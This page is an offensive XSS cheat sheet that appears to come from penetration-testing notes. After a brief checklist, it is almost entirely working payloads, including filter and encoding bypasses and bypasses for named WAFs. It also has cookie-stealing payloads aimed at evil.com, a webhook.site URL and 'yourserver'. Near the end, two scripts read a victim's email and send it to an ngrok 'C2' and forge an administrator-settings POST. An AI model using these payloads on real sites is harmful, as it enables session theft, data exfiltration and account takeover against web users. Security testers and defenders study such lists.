XSS
One thing you should understand when exploiting XSS is the behavior of the application towards specific payloads. The followings can be considered a checklist before exploiting XSS vulnerability:
Find the blacklisted/filtered characters. You can use XSS locators for this:
'';! - "<XSS>=&{()}
Observe what tags are blocked by WAF and which keywords are allowed (iframe, img, body etc.)
Try Character Encoding (URL encoding, Double URL encoding, UTF-8 Unicode encoding, Long UTF-8 Unicode encoding, Hex encoding etc.)
Try XSS using HTML quote encapsulation
Try URL string evasion
Create the payload list according to the allowed keywords
Brute-force the application with the XSS payload list you just created
XSS Locators:'';!--"<XSS>=&{()}Classic Payloads:<svg onload=alert(1)>"><svg onload=alert(1)><iframe src="javascript:alert(1)">"><script src=data:,alert(1)//script tag filter bypass:<svg/onload=alert(1)><script>alert(1)</script><script >alert(1)</script><ScRipT>alert(1)</sCriPt><%00script>alert(1)</script><script>al%00ert(1)</script>HTML tags:<img/src=x a='' onerror=alert(1)><IMG """><SCRIPT>alert(1)</SCRIPT>"><img src=`x`onerror=alert(1)><img src='/' onerror='alert("kalisa")'><IMG SRC=# onmouseover="alert('xxs')"><IMG SRC= onmouseover="alert('xxs')"><IMG onmouseover="alert('xxs')"><BODY ONLOAD=alert('XSS')><INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"><SCRIPT SRC=http:/evil.com/xss.js?< B >"><XSS<test accesskey=x onclick=alert(1)//test<svg><discard onbegin=alert(1)><script>image = new Image(); image.src="https://evil.com/?c="+document.cookie;</script><script>image = new Image(); image.src="http://"+document.cookie+"evil.com/";</script>Other tags:<BASE HREF="javascript:alert('XSS');//"><DIV STYLE="width: expression(alert('XSS'));"><TABLE BACKGROUND="javascript:alert('XSS')"><IFRAME SRC="javascript:alert('XSS');"></IFRAME><LINK REL="stylesheet" HREF="javascript:alert('XSS');"><xss id=x tabindex=1 onactivate=alert(1)></xss><xss onclick="alert(1)">test</xss><xss onmousedown="alert(1)">test</xss><body onresize=alert(1)>”onload=this.style.width=‘100px’><xss id=x onfocus=alert(document.cookie)tabindex=1>#x’;</script>CharCode:<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>if the input is already in script tag:@domain.com">user+'-alert`1`-'@domain.comAngularJS:{{constructor.constructor('alert(1)')()}}{{$on.constructor('alert(1)')()}}{{{}.")));alert(1)//"}}{{{}.")));alert(1)//"}}toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,11 4,116,40,49,41)Scriptless:<link rel=icon href="//evil?<iframe src="//evil?<iframe src="//evil?<input type=hidden type=image src="//evil?Unclosed Tags:<svg onload=alert(1)//DOM XSS:“><svg onload=alert(1)><img src=1 onerror=alert(1)>javascript:alert(document.cookie)\“-alert(1)}//<><img src=1 onerror=alert(1)>Another case:param=abc`;return+false});});alert`xss`;</script>abc`; Finish the stringreturn+false}); Finish the jQuery click function}); Finish the jQuery ready functionalert`xss`; Here we can execute our code</script> This closes the script tag to prevent JavaScript parsing errors
No parentheses:<script>onerror=alert;throw 1</script><script>throw onerror=eval,'=alert\x281\x29'</script><script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script><script>location='javascript:alert\x281\x29'</script><script>alert`1`</script><script>new Function`X${document.location.hash.substr`1`}`</script>No parentheses and no semicolons:<script>{onerror=alert}throw 1</script><script>throw onerror=alert,1</script><script>onerror=alert;throw 1337</script><script>{onerror=alert}throw 1337</script><script>throw onerror=alert,'some string',123,'haha'</script>No parentheses and no spaces:<script>Function`X${document.location.hash.substr`1`}```</script>Angle brackets HTML encoded (in an attribute):“onmouseover=“alert(1)‘-alert(1)-’If quote is escaped:‘}alert(1);{‘‘}alert(1)%0A{‘\’}alert(1);{//Embedded tab, newline, carriage return to break up XSS:<IMG SRC="jav	ascript:alert('XSS');"><IMG SRC="jav
ascript:alert('XSS');"><IMG SRC="jav
ascript:alert('XSS');">Other:<svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>: base64 value which is alert(‘XSS’)
Unicode:<script>\u0061lert(1)</script><script>\u{61}lert(1)</script><script>\u{0000000061}lert(1)</script>Hex:<script>eval('\x61lert(1)')</script>HTML:<svg><script>alert(1)</script></svg><svg><script>alert(1)</script></svg><svg><script>alert
(1)</script></svg><svg><script>x="",alert(1)//";</script></svg>\’-alert(1)//URL:<a href="javascript:x='%27-alert(1)-%27';">XSS</a>Double URL Encode:%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253EUnicode + HTML:<svg><script>\u0061\u006c\u0065\u0072\u0074(1)</script></svg>HTML + URL:<iframe src="javascript:'%3Cscript%3Ealert(1)%3C%2Fscript%3E'"></iframe>
Imperva Incapsula:%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%25 23x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%25 26%2523x29%3B%22%3E<img/src="x"/onerror="[JS-F**K Payload]"><iframe/onload='this["src"]="javas	cript:al"+"ert``"';><img/src=q onerror='new Function`al\ert\`1\``'>WebKnight:<details ontoggle=alert(1)><div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">F5 Big IP:<body style="height:1000px" onwheel="[DATA]"><div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]"><body style="height:1000px" onwheel="[JS-F**k Payload]"><div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[JS-F**k Payload]"><body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)"><div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">Barracuda WAF:<body style="height:1000px" onwheel="alert(1)"><div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">PHP-IDS:<svg+onload=+"[DATA]"<svg+onload=+"aler%25%37%34(1)"Mod-Security:<a href="j[785 bytes of (
	)]avascript:alert(1);">XSS</a>1⁄4script3⁄4alert(¢xss¢)1⁄4/script3⁄4<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>Quick Defense:<input type="search" onsearch="aler\u0074(1)"><details ontoggle="aler\u0074(1)">Sucuri WAF:1⁄4script3⁄4alert(¢xss¢)1⁄4/script3⁄4
--stored--<img src=x onerror=this.src='http://yourserver/?c='+document.cookie><script>document.write('<img src="[URL]?c='+document.cookie+'" />');</script>--reflected--http://vulnerable.webapp/index.php?name=<script>document.write('<img src="https://webhook.site/xxx-xxx-xxx/?c='%2bdocument.cookie%2b'" />');</script>----script 1--GET METHOD----// get some info from a GET requestvar a = new XMLHttpRequest();a.open("GET", "https://lol.php?xxx=1&ajax=full_email_address", false);a.withCredentials = true;a.send();var email=a.response;// exfiltrate to C2var b = new XMLHttpRequest();b.open("GET", "https://xxxxxxxx.ngrok.io/?email="+email);b.send();---scrip2---POST METHOD---// set somethingvar a = new XMLHttpRequest();a.open("POST", "https://xxxx.php?xxxx=1&screen=settings&role=administrator&action=save", false);a.withCredentials = true;a.send("send_email=on&receive_money=on");
See XSS tools here:
Last updated 1 day ago